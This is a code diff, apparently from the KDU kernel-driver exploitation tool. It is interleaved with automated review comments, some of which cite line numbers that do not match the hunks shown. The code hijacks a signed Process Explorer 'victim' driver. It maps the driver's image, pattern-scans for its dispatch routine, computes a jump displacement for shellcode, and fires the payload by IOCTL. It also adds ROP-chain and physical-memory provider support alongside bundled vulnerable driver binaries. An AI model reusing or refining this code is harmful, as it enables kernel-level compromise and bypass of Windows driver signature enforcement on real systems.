+ *VictimImage = NULL;
driverFileName = VppBuildDriverName(Name);
if (driverFileName) {
do {
-
+
if (supIsObjectExists((LPWSTR)L"\\Device", Name)) {
-
- supPrintfEvent(kduEventError,
+
+ supPrintfEvent(kduEventError,
"[!] Victim driver already loaded, force reload\r\n");
- supPrintfEvent(kduEventError,
+ supPrintfEvent(kduEventError,
"[!] Attempt to unload %ws\r\n", Name);
- NTSTATUS ntStatus;
- if (!VppLoadUnloadDriver(Name, driverFileName, FALSE, TRUE, &ntStatus)) {
-
- supPrintfEvent(kduEventError,
- "[!] Could not force unload victim, NTSTATUS(0x%lX) abort\r\n",
+ ntStatus = VppLoadUnloadDriver(Name,
+ driverFileName,
+ FALSE,
+ TRUE,
+ NULL,
+ NULL);
+
+ if (!NT_SUCCESS(ntStatus))
+ {
+ supPrintfEvent(kduEventError,
+ "[!] Could not force unload victim, NTSTATUS(0x%lX) abort\r\n",
ntStatus);
-
+
break;
}
else {
- supPrintfEvent(kduEventInformation,
+ supPrintfEvent(kduEventInformation,
"[+] Previous instance of victim driver unloaded\r\n");
}
}
- drvBuffer = (PBYTE)KDULoadResource(ResourceId,
- ModuleBase,
+ drvBuffer = (PBYTE)KDULoadResource(ResourceId,
+ ModuleBase,
&resourceSize,
PROVIDER_RES_KEY,
TRUE);
@@ -214,7 +235,25 @@ BOOL VpCreateCallback(
break;
}
- NTSTATUS ntStatus;
+ if (VictimImage) {
+
+ DWORD vSize = 0;
+ PVOID vpImage = PELoaderLoadImage(drvBuffer, &vSize);
+
+ if (vpImage == NULL) {
+
+ supPrintfEvent(kduEventError,
+ "[!] Could not map victim image, abort\r\n");
+
+ SetLastError(ERROR_INTERNAL_ERROR);
+ break;
+ }
+
+ printf_s("[+] Mapped victim image at %p with size 0x%lX bytes\r\n", vpImage, vSize);
+
+ *VictimImage = vpImage;
+ }
+
ULONG writeBytes;
printf_s("[+] Extracting victim driver \"%ws\" as \"%ws\"\r\n", Name, driverFileName);
@@ -234,28 +273,34 @@ BOOL VpCreateCallback(
// Driver is in use.
//
if (ntStatus == STATUS_SHARING_VIOLATION) {
- supPrintfEvent(kduEventError,
+ supPrintfEvent(kduEventError,
"[!] Sharing violation, driver maybe in use, please close all application(s) that are using this driver\r\n");
}
else {
supPrintfEvent(kduEventError,
"[!] Could not extract victim driver, NTSTATUS(0x%lX) abort\r\n",
- ntStatus);
-
+ ntStatus);
+
}
SetLastError(RtlNtStatusToDosError(ntStatus));
break;
}
- ntStatus = STATUS_UNSUCCESSFUL;
- if (VppLoadUnloadDriver(Name, driverFileName, TRUE, FALSE, &ntStatus)) {
+ ntStatus = VppLoadUnloadDriver(Name,
+ driverFileName,
+ TRUE,
+ FALSE,
+ Callback,
+ CallbackParam);
- SetLastError(RtlNtStatusToDosError(ntStatus));
+ if (NT_SUCCESS(ntStatus)) {
+
+ SetLastError(ERROR_SUCCESS);
if (VictimHandle) {
-
+
ntStatus = supOpenDriver(Name, DesiredAccess, &deviceHandle);
if (NT_SUCCESS(ntStatus)) {
*VictimHandle = deviceHandle;
@@ -265,6 +310,8 @@ BOOL VpCreateCallback(
}
}
+ bResult = TRUE;
+
}
else {
SetLastError(RtlNtStatusToDosError(ntStatus));
@@ -275,7 +322,7 @@ BOOL VpCreateCallback(
supHeapFree(driverFileName);
}
- return (deviceHandle != NULL);
+ return bResult;
}
/*
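Review bot: On the failure paths taken after the image is mapped (the extract-failure `break` and the load failure in earlier hunks of this function), `*VictimImage` still holds the `PELoaderLoadImage` allocation while `bResult` is FALSE, so the caller either leaks it or depends on a later `VpRelease` to free it; ownership on failure is undefined. Release it before returning when the call failed, using the same `VirtualFree` that `VpRelease` uses for this pointer. `VpCreateCallback` begins above the hunk.
```cpp
    // … unchanged: driverFileName cleanup …

    if (!bResult && VictimImage && *VictimImage) {
        VirtualFree(*VictimImage, 0, MEM_RELEASE);
        *VictimImage = NULL;
    }

    return bResult;
```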
@@ -294,7 +341,7 @@ BOOL VpReleaseCallback(
LPWSTR driverFileName = VppBuildDriverName(Name);
if (driverFileName) {
- bResult = VppLoadUnloadDriver(Name, driverFileName, FALSE, TRUE, NULL);
+ bResult = NT_SUCCESS(VppLoadUnloadDriver(Name, driverFileName, FALSE, TRUE, NULL, NULL));
DeleteFile(driverFileName);
supHeapFree(driverFileName);
}
@@ -319,6 +366,32 @@ VOID VpExecuteCallback(
supOpenDriver(Name, DesiredAccess, VictimHandle);
}
+/*
+* VpExecuteCallbackEx
+*
+* Purpose:
+*
+* Execute victim payload by IOCTL call.
+*
+*/
+VOID VpExecuteCallbackEx(
+ _In_ LPCWSTR Name,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE VictimHandle
+)
+{
+ HANDLE victimHandle = NULL;
+ ULONG dummy = 0;
+
+ if (NT_SUCCESS(supOpenDriver(Name, DesiredAccess, &victimHandle))) {
+
+ supCallDriver(victimHandle, 0xBADDAB, &dummy, sizeof(dummy), &dummy, sizeof(dummy));
+
+ }
+
+ *VictimHandle = victimHandle;
+}
+
/*
* VppOpenExistingDriverDevice
*
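Review bot: `VpExecuteCallbackEx` writes through `VictimHandle` unconditionally, while the `pfnVictimExecute` typedef it presumably implements declares the parameter `_Out_opt_` and `VpExecutePayload` forwards whatever the caller passed, so a NULL arriving through the interface dereferences here; mirror the sibling callbacks with `if (VictimHandle) *VictimHandle = victimHandle;` and make the SAL annotation consistent with victim.h. The return value of `supCallDriver` is discarded, so a failed IOCTL is indistinguishable from success. `0xBADDAB` is a bare magic number — give it a named constant next to the other victim definitions.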
@@ -395,10 +468,51 @@ BOOL VpCreateFromExistingCallback(
_In_ LPCWSTR Name,
_In_ ULONG ResourceId,
_In_ ACCESS_MASK DesiredAccess,
- _Out_opt_ PHANDLE VictimHandle)
+ _Out_opt_ PHANDLE VictimHandle,
+ _Out_opt_ PVOID* VictimImage,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam)
{
UNREFERENCED_PARAMETER(ModuleBase);
UNREFERENCED_PARAMETER(ResourceId);
+ UNREFERENCED_PARAMETER(Callback);
+ UNREFERENCED_PARAMETER(CallbackParam);
+
+ if (VictimHandle) *VictimHandle = NULL;
+
+ if (VictimImage) {
+
+ *VictimImage = NULL;
+
+ DWORD resourceSize = 0;
+ PBYTE drvBuffer = (PBYTE)KDULoadResource(ResourceId,
+ ModuleBase,
+ &resourceSize,
+ PROVIDER_RES_KEY,
+ TRUE);
+
+ if (drvBuffer == NULL) {
+ SetLastError(ERROR_FILE_NOT_FOUND);
+ return FALSE;
+ }
+
+ DWORD vSize = 0;
+ PVOID vpImage = PELoaderLoadImage(drvBuffer, &vSize);
+
+ if (vpImage == NULL) {
+
+ supPrintfEvent(kduEventError,
+ "[!] Could not map victim image, abort\r\n");
+
+ SetLastError(ERROR_INTERNAL_ERROR);
+ return FALSE;
+ }
+
+ printf_s("[+] Mapped victim image at %p with size 0x%lX bytes\r\n", vpImage, vSize);
+
+ *VictimImage = vpImage;
+
+ }
return VppOpenExistingDriverDevice(Name, DesiredAccess, VictimHandle);
}
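Review bot: `UNREFERENCED_PARAMETER(ModuleBase)` and `UNREFERENCED_PARAMETER(ResourceId)` are now wrong: both parameters are used in the `KDULoadResource` call a few lines below, so the two macros should be dropped. `drvBuffer` returned by `KDULoadResource` is not released after `PELoaderLoadImage` consumes it — if that buffer is heap-allocated, as the `supHeapFree` pattern elsewhere in this file suggests, it leaks on every call. When `VppOpenExistingDriverDevice` fails on the last line, `*VictimImage` is returned non-NULL alongside FALSE, the same ownership ambiguity as in `VpCreateCallback`; free and clear it on that path.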
@@ -419,3 +533,179 @@ BOOL VpReleaseCallbackStub(
return TRUE;
}
+
+/*
+* VpLoadDriverCallback
+*
+* Purpose:
+*
+* supLoadDriverEx callback to store specific data in registry entry.
+*
+*/
+NTSTATUS CALLBACK VpLoadDriverCallback(
+ _In_ PUNICODE_STRING RegistryPath,
+ _In_opt_ PVOID Param
+)
+{
+ NTSTATUS ntStatus = STATUS_SUCCESS;
+ VICTIM_LOAD_PARAMETERS* params;
+
+ UNREFERENCED_PARAMETER(RegistryPath);
+
+ if (Param == NULL)
+ return STATUS_INVALID_PARAMETER_2;
+
+ params = (VICTIM_LOAD_PARAMETERS*)Param;
+
+ switch (params->Provider->VictimId) {
+ case KDU_VICTIM_PE1627:
+ case KDU_VICTIM_PE1702:
+ default:
+ break;
+ }
+
+ return ntStatus;
+}
+
+/*
+* VpQueryInformation
+*
+* Purpose:
+*
+* Query various victim information.
+*
+*/
+_Success_(return != FALSE)
+BOOL VpQueryInformation(
+ _In_ PKDU_VICTIM_PROVIDER Context,
+ _In_ VICTIM_INFORMATION VictimInformationClass,
+ _Inout_ PVOID Information,
+ _In_ ULONG InformationLength)
+{
+ BOOL bResult = TRUE;
+ PVICTIM_IMAGE_INFORMATION imageInfo;
+ PVICTIM_DRIVER_INFORMATION driverInfo;
+
+ PVOID dispatchSignature = 0;
+ ULONG signatureSize = 0;
+
+ PVOID sectionBase;
+ ULONG sectionSize;
+
+ switch (VictimInformationClass) {
+
+ case VictimImageInformation:
+
+ if (InformationLength == sizeof(VICTIM_IMAGE_INFORMATION)) {
+
+ imageInfo = (VICTIM_IMAGE_INFORMATION*)Information;
+
+ dispatchSignature = Context->Data.DispatchSignature;
+ signatureSize = Context->Data.DispatchSignatureLength;
+
+ sectionBase = ntsupLookupImageSectionByName((CHAR*)TEXT_SECTION,
+ TEXT_SECTION_LEGNTH,
+ (PVOID)Context->Data.VictimImage,
+ §ionSize);
+
+ if (sectionBase && sectionSize) {
+
+ PBYTE ptrCode = NULL;
+
+ ptrCode = (PBYTE)ntsupFindPattern((PBYTE)sectionBase,
+ sectionSize,
+ (PBYTE)dispatchSignature,
+ signatureSize);
+
+ if (ptrCode) {
+ imageInfo->DispatchOffset = (ULONG_PTR)ptrCode & 0xffff;
+ imageInfo->DispatchPageOffset = imageInfo->DispatchOffset & 0xfff;
+
+ LONG_PTR rel = (LONG_PTR)sectionBase - (LONG_PTR)ptrCode - 5;
+
+ imageInfo->JumpValue = (ULONG)rel;
+ }
+ else {
+ SetLastError(ERROR_NOT_FOUND);
+ bResult = FALSE;
+ }
+
+ }
+ else {
+ SetLastError(ERROR_SECTION_NOT_FOUND);
+ bResult = FALSE;
+ }
+
+ }
+ else {
+ SetLastError(ERROR_INVALID_PARAMETER);
+ bResult = FALSE;
+ }
+
+ break;
+
+ case VictimDriverInformation:
+
+ if (InformationLength == sizeof(VICTIM_DRIVER_INFORMATION)) {
+
+ driverInfo = (VICTIM_DRIVER_INFORMATION*)Information;
+
+ PRTL_PROCESS_MODULE_INFORMATION target;
+ PRTL_PROCESS_MODULES modulesList = (PRTL_PROCESS_MODULES)supGetLoadedModulesList(FALSE, NULL);
+ if (modulesList) {
+
+ ANSI_STRING driverNameAs;
+ UNICODE_STRING driverNameUs;
+
+ WCHAR szTargetDriver[MAX_PATH];
+
+ StringCchPrintf(szTargetDriver, MAX_PATH, L"%ws.sys", Context->Name);
+ RtlInitUnicodeString(&driverNameUs, szTargetDriver);
+
+ driverNameAs.Buffer = NULL;
+ driverNameAs.Length = driverNameAs.MaximumLength = 0;
+
+ NTSTATUS ntStatus;
+
+ ntStatus = RtlUnicodeStringToAnsiString(&driverNameAs, &driverNameUs, TRUE);
+ if (NT_SUCCESS(ntStatus) && driverNameAs.Buffer) {
+
+ target = (PRTL_PROCESS_MODULE_INFORMATION)ntsupFindModuleEntryByName(modulesList, driverNameAs.Buffer);
+ if (target) {
+ driverInfo->LoadedImageBase = (ULONG_PTR)target->ImageBase;
+ driverInfo->ImageSize = target->ImageSize;
+ }
+
+ RtlFreeAnsiString(&driverNameAs);
+ }
+ else {
+ SetLastError(RtlNtStatusToDosError(ntStatus));
+ bResult = FALSE;
+ }
+ supHeapFree(modulesList);
+ }
+ else {
+ SetLastError(ERROR_INTERNAL_ERROR);
+ bResult = FALSE;
+ }
+ }
+ else {
+ SetLastError(ERROR_INVALID_PARAMETER);
+ bResult = FALSE;
+ }
+
+ break;
+
+ case VictimRopChainInformation:
+ UNREFERENCED_PARAMETER(Information);
+ bResult = FALSE;
+ break;
+
+ default:
+ UNREFERENCED_PARAMETER(Information);
+ bResult = FALSE;
+ break;
+ }
+
+ return bResult;
+}
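Review bot: `VpQueryInformation` passes `Context->Data.VictimImage` to `ntsupLookupImageSectionByName` without checking it, yet the image is only mapped when `VpCreate` succeeded with an image slot and `VpRelease` frees it, so a NULL or stale pointer can reach the section lookup; add at the top of `case VictimImageInformation:` the guard `if (Context->Data.VictimImage == NULL) { SetLastError(ERROR_INVALID_PARAMETER); bResult = FALSE; break; }`. In `case VictimDriverInformation:`, when `ntsupFindModuleEntryByName` returns NULL the function still returns TRUE with `driverInfo` untouched, so the caller cannot tell the driver was not found; set `ERROR_NOT_FOUND` and `bResult = FALSE` there. `DispatchOffset` is derived as `(ULONG_PTR)ptrCode & 0xffff`, i.e. the low 16 bits of an absolute user-mode address, which only equals an image-relative offset if the mapped base is 64 KiB aligned and the routine lies in the first 64 KiB; an explicit subtraction from `Context->Data.VictimImage` would not depend on that (confirm against the consumer of `DispatchHandlerOffset`, which is not in this diff). `VpLoadDriverCallback` is a no-op whose every `case` falls to `break`; a `// TODO: per-victim registry data not written yet` comment would stop readers from hunting for the missing logic.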
diff --git a/Source/Hamakaze/victim.h b/Source/Hamakaze/victim.h
index 3fb2f0c..f6acae0 100644
--- a/Source/Hamakaze/victim.h
+++ b/Source/Hamakaze/victim.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2018 - 2022
+* (C) COPYRIGHT AUTHORS, 2018 - 2023
*
* TITLE: VICTIM.H
*
-* VERSION: 1.20
+* VERSION: 1.30
*
-* DATE: 08 Feb 2022
+* DATE: 20 Mar 2023
*
* Victim support prototypes and definitions.
*
@@ -24,7 +24,10 @@ typedef BOOL(WINAPI* pfnVictimCreate)(
_In_ LPCWSTR Name,
_In_ ULONG ResourceId,
_In_ ACCESS_MASK DesiredAccess,
- _Out_opt_ PHANDLE VictimHandle
+ _Out_opt_ PHANDLE VictimHandle,
+ _Out_opt_ PVOID *VictimImage,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam
);
typedef BOOL(WINAPI* pfnVictimRelease)(
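Review bot: The new `VictimImage` out-parameter carries no ownership statement: the caller receives a `PVOID` it did not allocate, and the provider also keeps a copy in `Data.VictimImage` (L3169 in a later hunk of this file), so it is unclear whether the caller or `VpRelease` frees the buffer and whether it stays valid after the victim handle is closed. Add a comment at the typedef such as `// VictimImage: copy of the victim driver image kept by the provider in Data.VictimImage; released by the provider, caller must not free — confirm against VpRelease`, since the release path is not visible in this chunk. The same gap applies to `VpCreate` (L3177), `VpCreateCallback` (L3187) and `VpCreateFromExistingCallback` (L3198). Minor style point: the declarator is written `PVOID *VictimImage` here but `PVOID* VictimImage` at L3188 and L3199.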
@@ -37,6 +40,28 @@ typedef VOID(WINAPI* pfnVictimExecute)(
_Out_opt_ PHANDLE VictimHandle
);
+typedef enum _VICTIM_INFORMATION {
+ VictimImageInformation = 0,
+ VictimDriverInformation,
+ VictimRopChainInformation,
+ MaxVictimInformation
+} VICTIM_INFORMATION;
+
+typedef struct _VICTIM_IMAGE_INFORMATION {
+ ULONG DispatchOffset;
+ ULONG DispatchPageOffset;
+ ULONG JumpValue;
+} VICTIM_IMAGE_INFORMATION, * PVICTIM_IMAGE_INFORMATION;
+
+typedef struct _VICTIM_DRIVER_INFORMATION {
+ ULONG_PTR LoadedImageBase;
+ ULONG ImageSize;
+} VICTIM_DRIVER_INFORMATION, * PVICTIM_DRIVER_INFORMATION;
+
+typedef struct _VICTIM_LOAD_PARAMETERS {
+ struct _KDU_VICTIM_PROVIDER *Provider;
+} VICTIM_LOAD_PARAMETERS, * PVICTIM_LOAD_PARAMETERS;
+
//
// No optional victim flags specified, this is default value.
//
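Review bot: `VICTIM_IMAGE_INFORMATION` and `VICTIM_DRIVER_INFORMATION` have no field documentation, and `JumpValue` in particular is a `ULONG` that the implementation fills by truncating a `LONG_PTR` (`imageInfo->JumpValue = (ULONG)rel;` in the victim.cpp hunk above) with no range check, so a displacement that does not fit in 32 bits is silently wrapped. Document the field as a 32-bit value (`ULONG JumpValue; // 32-bit relative displacement; producer must verify the LONG_PTR fits before truncating`) and have the producer fail with `SetLastError(ERROR_ARITHMETIC_OVERFLOW)` when it does not. `VictimRopChainInformation` is listed in the enum, but the visible implementation returns FALSE for it without calling SetLastError, so a caller sees a stale last-error; mark it `// reserved, not implemented` until it has a body. `MaxVictimInformation` would also benefit from `// sentinel, not a valid class`.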
@@ -51,6 +76,7 @@ typedef struct _KDU_VICTIM_PROVIDER {
LPCWSTR Name; //same as device name
LPCWSTR Desc; //optional
ULONG ResourceId;
+ ULONG VictimId;
ACCESS_MASK DesiredAccess;
union {
ULONG Flags;
@@ -64,12 +90,21 @@ typedef struct _KDU_VICTIM_PROVIDER {
pfnVictimRelease Release;
pfnVictimExecute Execute;
} Callbacks;
+
+ struct {
+ PVOID DispatchSignature;
+ ULONG DispatchSignatureLength;
+ PVOID VictimImage;
+ } Data;
+
} KDU_VICTIM_PROVIDER, * PKDU_VICTIM_PROVIDER;
BOOL VpCreate(
_Inout_ PKDU_VICTIM_PROVIDER Context,
_In_opt_ HINSTANCE ModuleBase,
- _Out_opt_ PHANDLE VictimHandle);
+ _Out_opt_ PHANDLE VictimHandle,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam);
BOOL VpRelease(
_In_ PKDU_VICTIM_PROVIDER Context,
@@ -84,7 +119,10 @@ BOOL VpCreateCallback(
_In_ LPCWSTR Name,
_In_ ULONG ResourceId,
_In_ ACCESS_MASK DesiredAccess,
- _Out_opt_ PHANDLE VictimHandle);
+ _Out_opt_ PHANDLE VictimHandle,
+ _Out_opt_ PVOID* VictimImage,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam);
BOOL VpReleaseCallback(
_In_ LPCWSTR Name);
@@ -99,12 +137,31 @@ BOOL VpCreateFromExistingCallback(
_In_ LPCWSTR Name,
_In_ ULONG ResourceId,
_In_ ACCESS_MASK DesiredAccess,
- _Out_opt_ PHANDLE VictimHandle);
+ _Out_opt_ PHANDLE VictimHandle,
+ _Out_opt_ PVOID* VictimImage,
+ _In_opt_ pfnLoadDriverCallback Callback,
+ _In_opt_ PVOID CallbackParam);
VOID VpExecuteFromExistingCallback(
_In_ LPCWSTR Name,
_In_ ACCESS_MASK DesiredAccess,
_Out_ PHANDLE VictimHandle);
+VOID VpExecuteCallbackEx(
+ _In_ LPCWSTR Name,
+ _In_ ACCESS_MASK DesiredAccess,
+ _Out_ PHANDLE VictimHandle);
+
BOOL VpReleaseCallbackStub(
_In_ LPCWSTR Name);
+
+NTSTATUS CALLBACK VpLoadDriverCallback(
+ _In_ PUNICODE_STRING RegistryPath,
+ _In_opt_ PVOID Param);
+
+_Success_(return != FALSE)
+BOOL VpQueryInformation(
+ _In_ PKDU_VICTIM_PROVIDER Context,
+ _In_ VICTIM_INFORMATION VictimInformationClass,
+ _Inout_ PVOID Information,
+ _In_ ULONG InformationLength);
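Review bot: `VpQueryInformation`'s prototype does not say which structure each `VICTIM_INFORMATION` class expects, nor that `InformationLength` must equal `sizeof` that structure exactly, which is what the implementation checks (`if (InformationLength == sizeof(VICTIM_DRIVER_INFORMATION))` at L3031). The `_Inout_` annotation also hides a contract gap: for `VictimDriverInformation` the implementation returns TRUE without touching `LoadedImageBase`/`ImageSize` when the module is not found (L3056-3059), so a caller that did not zero the struct reads stale data as success. Either document `// caller must zero-initialize Information; fields are left untouched when the driver is not loaded` or make the not-found path `SetLastError(ERROR_NOT_FOUND); bResult = FALSE;`. `VpExecuteCallbackEx` and `VpLoadDriverCallback` are added without a comment describing when each is used or what `Param` is expected to point to.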
diff --git a/Source/Shared/consts.h b/Source/Shared/consts.h
index 54934e1..d5c2138 100644
--- a/Source/Shared/consts.h
+++ b/Source/Shared/consts.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: CONSTS.H
*
-* VERSION: 1.28
+* VERSION: 1.30
*
-* DATE: 01 Dec 2022
+* DATE: 20 Mar 2023
*
* Global consts.
*
@@ -20,9 +20,9 @@
#pragma once
#define KDU_VERSION_MAJOR 1
-#define KDU_VERSION_MINOR 2
-#define KDU_VERSION_REVISION 8
-#define KDU_VERSION_BUILD 2212
+#define KDU_VERSION_MINOR 3
+#define KDU_VERSION_REVISION 0
+#define KDU_VERSION_BUILD 2303
#define KDU_MIN_NTBUILDNUMBER 0x1DB1 //Windows 7 SP1
#define KDU_MAX_NTBUILDNUMBER 0xFFFFFFFF //Undefined
@@ -34,7 +34,8 @@
#define DRIVER_REGKEY L"%wS\\System\\CurrentControlSet\\Services\\%wS"
#define PROCEXP152 L"PROCEXP152"
-#define PROCEXP_DESC L"Process Explorer"
+#define PROCEXP1627_DESC L"Process Explorer v16"
+#define PROCEXP1702_DESC L"Process Explorer v17"
#define NTOSKRNL_EXE L"ntoskrnl.exe"
#define CI_DLL L"CI.dll"
@@ -59,11 +60,19 @@
#define SYSTEM_PID_MAGIC 4
-#define PE152_DISPATCH_OFFSET 0x2220 // Valid only for 1.5.2
-#define PE152_DISPATCH_PAGE_OFFSET 0x0220
+#define TEXT_SECTION ".text"
+#define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION)
#define SHELLCODE_SMALL 0x200
+//
+// Victim providers id table
+//
+#define KDU_VICTIM_PE1627 0
+#define KDU_VICTIM_PE1702 1
+#define KDU_VICTIM_MAX 2
+#define KDU_VICTIM_DEFAULT KDU_VICTIM_PE1702
+
//
// Data id table
//
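Review bot: `TEXT_SECTION_LEGNTH` is misspelled, and its value `sizeof(TEXT_SECTION)` is 6 because it includes the terminating NUL of `".text"`; that is right for a byte-for-byte compare against an 8-byte `IMAGE_SECTION_HEADER.Name`, but off by one if it is ever used as a string length, and the macro does not say which. Rename it `TEXT_SECTION_LENGTH` (its uses are outside this chunk) and add `// includes the NUL; intended for memcmp against IMAGE_SECTION_HEADER.Name` — or whatever the actual intent is, which I cannot see from here. The `KDU_VICTIM_*` ids read as indices into a table of `KDU_VICTIM_MAX` entries; whatever consumes `KDU_DB_ENTRY.VictimId` (kdubase.h) should reject values `>= KDU_VICTIM_MAX` before indexing, since the id comes from the provider database rather than from code.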
@@ -76,7 +85,8 @@
//
// Driver id table
//
-#define IDR_PROCEXP 100
+#define IDR_PROCEXP1627 2000
+#define IDR_PROCEXP1702 2001
#define IDR_INTEL_NAL 103
#define IDR_RTCORE64 105
#define IDR_GDRV 106
@@ -107,7 +117,7 @@
#define IDR_ASROCKDRV 131
#define IDR_ALSYSIO64 132
#define IDR_AMD_RYZENMASTER 133
-#define IDR_RESERVED0 134
+#define IDR_PHYSMEM 134
#define IDR_RESERVED1 135
#define IDR_RESERVED2 136
#define IDR_RESERVED3 137
@@ -148,6 +158,9 @@
#define KDU_PROVIDER_ASROCK 28
#define KDU_PROVIDER_ALCPU 29
#define KDU_PROVIDER_AMD_RYZENMASTER 30
+#define KDU_PROVIDER_HR_PHYSMEM 31
+
+#define KDU_PROVIDER_DEFAULT KDU_PROVIDER_INTEL_NAL
//
// KDU provider flags
@@ -200,6 +213,12 @@
//
#define KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE 0x00000080
+//
+// When provider support both virtual/physical memory acccess.
+//
+#define KDUPROV_FLAGS_PREFER_PHYSICAL 0x00000100
+#define KDUPROV_FLAGS_PREFER_VIRTUAL 0x00000200
+
//
// KDU shellcode support flags
//
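Review bot: The new comment misspells "access" (`acccess`) and does not say whether `KDUPROV_FLAGS_PREFER_PHYSICAL` and `KDUPROV_FLAGS_PREFER_VIRTUAL` are mutually exclusive or which one wins when both or neither is set; since they are mirrored bit-for-bit as `PreferPhysical`/`PreferVirtual` in `KDU_DB_ENTRY` (kdubase.h hunk), a reader needs that rule stated here. Suggested wording: `// When a provider supports both virtual and physical memory access, select which one to use. At most one of these should be set; if neither is set the provider default applies.` — adjust the last clause to the real behaviour, which is not visible in this chunk.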
diff --git a/Source/Shared/kdubase.h b/Source/Shared/kdubase.h
index 71cce52..8dd690b 100644
--- a/Source/Shared/kdubase.h
+++ b/Source/Shared/kdubase.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2022
+* (C) COPYRIGHT AUTHORS, 2022 - 2023
*
* TITLE: KDUBASE.H
*
-* VERSION: 1.27
+* VERSION: 1.30
*
-* DATE: 10 Nov 2022
+* DATE: 20 Mar 2023
*
* Base KDU definitions.
*
@@ -36,6 +36,7 @@ typedef struct _KDU_DB_ENTRY {
ULONG MaxNtBuildNumberSupport;
ULONG ResourceId;
ULONG ProviderId;
+ ULONG VictimId;
KDU_SOURCEBASE DrvSourceBase;
union {
ULONG Flags;
@@ -48,7 +49,9 @@ typedef struct _KDU_DB_ENTRY {
ULONG PML4FromLowStub : 1;
ULONG NoVictim : 1;
ULONG PhysMemoryBruteForce : 1;
- ULONG Reserved : 24;
+ ULONG PreferPhysical : 1;
+ ULONG PreferVirtual : 1;
+ ULONG Reserved : 22;
};
};
ULONG SupportedShellFlags;
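Review bot: The two new bit-fields are only correct because they land on bits 8 and 9, matching `KDUPROV_FLAGS_PREFER_PHYSICAL` (0x100) and `KDUPROV_FLAGS_PREFER_VIRTUAL` (0x200) in consts.h, through the union with `ULONG Flags`; bit-field allocation order is implementation-defined, so this is a silent compiler-specific contract that nothing documents. Tie each field to its flag value in a comment (`ULONG PreferPhysical : 1; // == KDUPROV_FLAGS_PREFER_PHYSICAL (0x100)`, likewise for `PreferVirtual`) so the next flag added to either header is checked against the other. The `Reserved` width was correctly reduced to 22 so the union still spans 32 bits; a comment stating that the widths must sum to 32 would keep it that way.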
diff --git a/Source/Tanikaze/Tanikaze.vcxproj b/Source/Tanikaze/Tanikaze.vcxproj
index be3b446..6c4879b 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj
+++ b/Source/Tanikaze/Tanikaze.vcxproj
@@ -210,7 +210,10 @@
+
+
+
diff --git a/Source/Tanikaze/Tanikaze.vcxproj.filters b/Source/Tanikaze/Tanikaze.vcxproj.filters
index 44683d1..fbebd68 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj.filters
+++ b/Source/Tanikaze/Tanikaze.vcxproj.filters
@@ -145,6 +145,15 @@
Resource Files
+
+ Resource Files
+
+
+ Resource Files
+
+
+ Resource Files
+
diff --git a/Source/Tanikaze/data/KMUEXE.bin b/Source/Tanikaze/data/KMUEXE.bin
index 5166395..002c866 100644
Binary files a/Source/Tanikaze/data/KMUEXE.bin and b/Source/Tanikaze/data/KMUEXE.bin differ
diff --git a/Source/Tanikaze/data/KMUSIG.bin b/Source/Tanikaze/data/KMUSIG.bin
index 8e2fb2e..58c4ad0 100644
Binary files a/Source/Tanikaze/data/KMUSIG.bin and b/Source/Tanikaze/data/KMUSIG.bin differ
diff --git a/Source/Tanikaze/data/dbutilcat.bin b/Source/Tanikaze/data/dbutilcat.bin
index bc5214f..756ba3b 100644
Binary files a/Source/Tanikaze/data/dbutilcat.bin and b/Source/Tanikaze/data/dbutilcat.bin differ
diff --git a/Source/Tanikaze/data/dbutilinf.bin b/Source/Tanikaze/data/dbutilinf.bin
index e407a9a..f0846c3 100644
Binary files a/Source/Tanikaze/data/dbutilinf.bin and b/Source/Tanikaze/data/dbutilinf.bin differ
diff --git a/Source/Tanikaze/drv/ALSysIO64.bin b/Source/Tanikaze/drv/ALSysIO64.bin
index 18fa28d..ff31eb3 100644
Binary files a/Source/Tanikaze/drv/ALSysIO64.bin and b/Source/Tanikaze/drv/ALSysIO64.bin differ
diff --git a/Source/Tanikaze/drv/ATSZIO64.bin b/Source/Tanikaze/drv/ATSZIO64.bin
index bf09a2f..02647c5 100644
Binary files a/Source/Tanikaze/drv/ATSZIO64.bin and b/Source/Tanikaze/drv/ATSZIO64.bin differ
diff --git a/Source/Tanikaze/drv/AsIO3.bin b/Source/Tanikaze/drv/AsIO3.bin
index 795d683..dafac1c 100644
Binary files a/Source/Tanikaze/drv/AsIO3.bin and b/Source/Tanikaze/drv/AsIO3.bin differ
diff --git a/Source/Tanikaze/drv/AsrDrv106.bin b/Source/Tanikaze/drv/AsrDrv106.bin
index 658473a..e558f81 100644
Binary files a/Source/Tanikaze/drv/AsrDrv106.bin and b/Source/Tanikaze/drv/AsrDrv106.bin differ
diff --git a/Source/Tanikaze/drv/DbUtil2_3.bin b/Source/Tanikaze/drv/DbUtil2_3.bin
index 0770209..bca03a4 100644
Binary files a/Source/Tanikaze/drv/DbUtil2_3.bin and b/Source/Tanikaze/drv/DbUtil2_3.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64.bin b/Source/Tanikaze/drv/DirectIo64.bin
index f35103c..9b91215 100644
Binary files a/Source/Tanikaze/drv/DirectIo64.bin and b/Source/Tanikaze/drv/DirectIo64.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64_2.bin b/Source/Tanikaze/drv/DirectIo64_2.bin
index a2344e4..7786566 100644
Binary files a/Source/Tanikaze/drv/DirectIo64_2.bin and b/Source/Tanikaze/drv/DirectIo64_2.bin differ
diff --git a/Source/Tanikaze/drv/EneIo64.bin b/Source/Tanikaze/drv/EneIo64.bin
index 2babeaa..c549b26 100644
Binary files a/Source/Tanikaze/drv/EneIo64.bin and b/Source/Tanikaze/drv/EneIo64.bin differ
